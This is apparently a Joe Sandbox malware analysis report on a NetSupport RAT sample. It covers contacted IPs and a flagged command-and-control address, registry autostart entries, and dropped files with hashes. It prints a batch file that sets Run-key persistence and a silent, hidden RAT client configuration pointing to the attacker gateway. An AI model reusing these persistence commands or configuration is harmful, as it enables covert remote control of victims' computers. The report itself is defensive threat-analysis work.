URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.pci.co.uk/support	file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	false	high
http://%s/testpage.htmwininet.dll	file.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr	false	high
http://geo.netsupportsoftware.com/location/loca.aspc	shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	false	high
http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)	file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	false	high
http://www.pci.co.uk/supportsupport	file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	false	high
http://www.symauth.com/rpa00	file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	false	high
http://127.0.0.1RESUMEPRINTING	file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	false	high
http://%s/testpage.htm	file.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr	false	high
http://geo.netsupportsoftware.com/location/loca.asp0	shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	false	high
http://geo.netsupportsoftware.com/location/loca.aspU	shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	false	high
http://www.netsupportschool.com/tutor-assistant.asp11(	file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	false	high
http://127.0.0.1	shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	false	high
http://geo.netsupportsoftware.com/location/loca.aspi	shv.exe, 00000006.00000002.3994135214.00000000012D1000.00000004.00000020.00020000.00000000.sdmp	false	high
http://www.symauth.com/cps0(	file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	false	high
http://www.netsupportschool.com/tutor-assistant.asp	file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	false	high
http://%s/fakeurl.htm	file.exe, 00000000.00000003.2145215251.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2146640720.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2144886227.00000229E541E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.61.128.74	unknown	United States		9009	M247GB	true
104.26.0.231	geo.netsupportsoftware.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562378
Start date and time:	2024-11-25 15:09:24 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal96.rans.evad.winEXE@20/13@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 83% Number of executed functions: 172 Number of non-executed functions: 92
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
15:10:19	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\shv.exe
15:10:28	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\shv.exe
15:10:37	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\shv.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.61.128.74	file.exe	Get hash	malicious	NetSupport RAT	Browse	http://45.61.128.74/fakeurl.htm
45.61.128.74	file.exe	Get hash	malicious	NetSupport RAT	Browse	http://45.61.128.74/fakeurl.htm
104.26.0.231	Pyyidau.vbs	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	KC0uZWwr8p.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	geo.netsupportsoftware.com/location/loca.asp
	KC0uZWwr8p.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	geo.netsupportsoftware.com/location/loca.asp
	hkpqXovZtS.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	qvoLvRpRbr.msi	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	EMX97rT0GX.msi	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	Support_auto.msi	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
geo.netsupportsoftware.com	Pyyidau.vbs	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	Pyyidau.vbs	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	KC0uZWwr8p.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	104.26.0.231
	KC0uZWwr8p.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	104.26.0.231
	72BF1aHUKl.msi	Get hash	malicious	NetSupport RAT	Browse	172.67.68.212
	hkpqXovZtS.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
M247GB	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	93.120.123.217
	loligang.ppc.elf	Get hash	malicious	Mirai	Browse	104.224.90.41
	comprobante.exe	Get hash	malicious	Remcos	Browse	176.10.80.43
	7jBzTH9FXQ.exe	Get hash	malicious	Unknown	Browse	95.174.64.138
	fACYdCvub8.exe	Get hash	malicious	Unknown	Browse	95.174.66.19
	7jBzTH9FXQ.exe	Get hash	malicious	Unknown	Browse	193.29.107.181
	fACYdCvub8.exe	Get hash	malicious	Unknown	Browse	217.138.199.203
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	192.230.38.194
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	38.202.249.45
CLOUDFLARENETUS	http://sharefileonline.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	7qsPAygCOx.xlsx	Get hash	malicious	Snake Keylogger	Browse	104.21.1.182
	jbuESggTv0.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	tJzfnaqOxj.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	LAQfpnQvPQ.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	DGTCkacbSz.xlsx	Get hash	malicious	Snake Keylogger	Browse	172.67.129.178
	idk_1.ps1	Get hash	malicious	Unknown	Browse	172.67.129.178
	FreeCs2Skins.ps1	Get hash	malicious	Unknown	Browse	172.67.129.178

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Netstat\HTCTL32.DLL	file.exe	Get hash	malicious	NetSupport RAT	Browse
	file.exe	Get hash	malicious	NetSupport RAT	Browse
	KC0uZWwr8p.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	KC0uZWwr8p.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	file.exe	Get hash	malicious	NetSupport RAT	Browse
	file.exe	Get hash	malicious	NetSupport RAT	Browse
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse

Created / dropped Files

C:\Users\Public\Netstat\HTCTL32.DLL

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	328056
Entropy (8bit):	6.754723001562745
Encrypted:	false
SSDEEP:	6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
MD5:	2D3B207C8A48148296156E5725426C7F
SHA1:	AD464EB7CF5C19C8A443AB5B590440B32DBC618F
SHA-256:	EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
SHA-512:	55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
Malicious:	false
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\HTCTL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: KC0uZWwr8p.exe, Detection: malicious, Browse Filename: KC0uZWwr8p.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: CiscoSetup.exe, Detection: malicious, Browse Filename: CiscoSetup.exe, Detection: malicious, Browse Filename: CiscoSetup.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Netstat\NSM.LIC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	257
Entropy (8bit):	5.119720931145611
Encrypted:	false
SSDEEP:	6:O/oPn4xRPjwx1lDKHMoEEjLgpW2MezvLdNWYpPM/ioVLa8l6i7s:XeR7wx6JjjqW2MePBPM/ioU8l6J
MD5:	7067AF414215EE4C50BFCD3EA43C84F0
SHA1:	C331D410672477844A4CA87F43A14E643C863AF9
SHA-256:	2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
SHA-512:	17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
Malicious:	false
Preview:	1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..

C:\Users\Public\Netstat\PCICHEK.DLL

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18808
Entropy (8bit):	6.22028391196942
Encrypted:	false
SSDEEP:	192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
MD5:	A0B9388C5F18E27266A31F8C5765B263
SHA1:	906F7E94F841D464D4DA144F7C858FA2160E36DB
SHA-256:	313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
SHA-512:	6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
Malicious:	false
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICHEK.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Netstat\PCICL32.DLL

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3735416
Entropy (8bit):	6.525042992590476
Encrypted:	false
SSDEEP:	49152:cTXNZ+0ci2aYNT8wstdAukudJ1xTvIZamclSp+73mPu:cTXNo0cpKwstTJIkS43mm
MD5:	00587238D16012152C2E951A087F2CC9
SHA1:	C4E27A43075CE993FF6BB033360AF386B2FC58FF
SHA-256:	63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
SHA-512:	637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.t.I.'.I.'.I.'A..'.I.'...'.I.'.?#'.I.'...'.I.'.1.'.I.'.I.'.J.'.1.'.I.'.1.'.I.'..#',I.'.."'.I.'...'.I.'...'.I.'...'.I.'Rich.I.'................PE..L......V...........!......... ..............0................................9.....f-9.....................................4........`................8.x)...P7.p....@.......................P.......P..@............0..........`....................text............................... ..`.rdata.......0......................@..@.data....%..........................@....tls.........@......................@....hhshare.....P......................@....rsrc........`......................@..@.reloc..(2...P7..4....6.............@..B........................................................................................................................................................................................................

C:\Users\Public\Netstat\TCCTL32.DLL

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	396664
Entropy (8bit):	6.809064783360712
Encrypted:	false
SSDEEP:	12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
MD5:	EAB603D12705752E3D268D86DFF74ED4
SHA1:	01873977C871D3346D795CF7E3888685DE9F0B16
SHA-256:	6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
SHA-512:	77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\TCCTL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............\|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Netstat\client32.ini

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	700
Entropy (8bit):	5.533099732210104
Encrypted:	false
SSDEEP:	12:Wrqzd+mPZGS/py6z8BlsVTXuZ7+DP981E7GXXfDWQClnmSuZIAlkz6:mqzEmPZly6YBlLoG1fXXfDioIAaz6
MD5:	5778ABD7CF2E8039239CD5982281D61A
SHA1:	9AA6E80A115343A100031C9473FC6A071EEFD07E
SHA-256:	0BD4DC8B66C588F715B117021EF14C959E396F5CC6041F885F0D121401BC267A
SHA-512:	DC01567D881D48554732747A286AC9A95EF095B4CB860F384B85636B160778C9EFE366F53550B74D9DDF504B293F03BBB252E5247F03490E4567AD142DEF6E0A
Malicious:	false
Preview:	0x289612fe....[Client].._present=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAOeJWid73S6SvOyjjiTDVewA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0......[HTTP]..GatewayAddress=45.61.128.74:443..gsk=EFHH;K>OBDEJ9A<I@BCB..gskmode=0..gsku=EFHH;K>OBDEJ9A<I@BCB..GSKX=EFHH;K>OBDEJ9A<I@BCB....

C:\Users\Public\Netstat\msvcr100.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	773968
Entropy (8bit):	6.901559811406837
Encrypted:	false
SSDEEP:	12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
MD5:	0E37FBFA79D349D672456923EC5FBBE3
SHA1:	4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
SHA-256:	8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
SHA-512:	2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Netstat\netsup.bat

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	519
Entropy (8bit):	5.1565107291104475
Encrypted:	false
SSDEEP:	12:HVj0Kprgidqu1M+Vj0Kprgidqu1oOrvuprgidqu1kprgidqu1oOC:HVyINVyI4cIjI4T
MD5:	B50D05F1710CD8674DB0AE8207722DD0
SHA1:	9896143256FB62F915EA41D8001AD10BC66D99BB
SHA-256:	F4A4726FDF39D43807ED2786BB9B2F881C8C7C8B666E14A96F7B2239C7A4BEDD
SHA-512:	3D57684675904055EA3BAAE6E343F5B5A068104EBF97EDFA28687A18855B3F5173847B9283C704636A457B434CA3ACB9D27A4075ECBCD1E5F6A2735B1E444D04
Malicious:	true
Preview:	@echo off..REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\shv.exe"..REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\shv.exe"..start %Public%\Netstat\shv.exe..REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\shv.exe"..REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\shv.exe"..start %Public%\Netstat\shv.exe

C:\Users\Public\Netstat\nskbfltr.inf

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	328
Entropy (8bit):	4.93007757242403
Encrypted:	false
SSDEEP:	6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
MD5:	26E28C01461F7E65C402BDF09923D435
SHA1:	1D9B5CFCC30436112A7E31D5E4624F52E845C573
SHA-256:	D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
SHA-512:	C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
Malicious:	false
Preview:	; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

C:\Users\Public\Netstat\pcicapi.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33144
Entropy (8bit):	6.737780491933496
Encrypted:	false
SSDEEP:	768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
MD5:	DCDE2248D19C778A41AA165866DD52D0
SHA1:	7EC84BE84FE23F0B0093B647538737E1F19EBB03
SHA-256:	9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
SHA-512:	C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
Malicious:	true
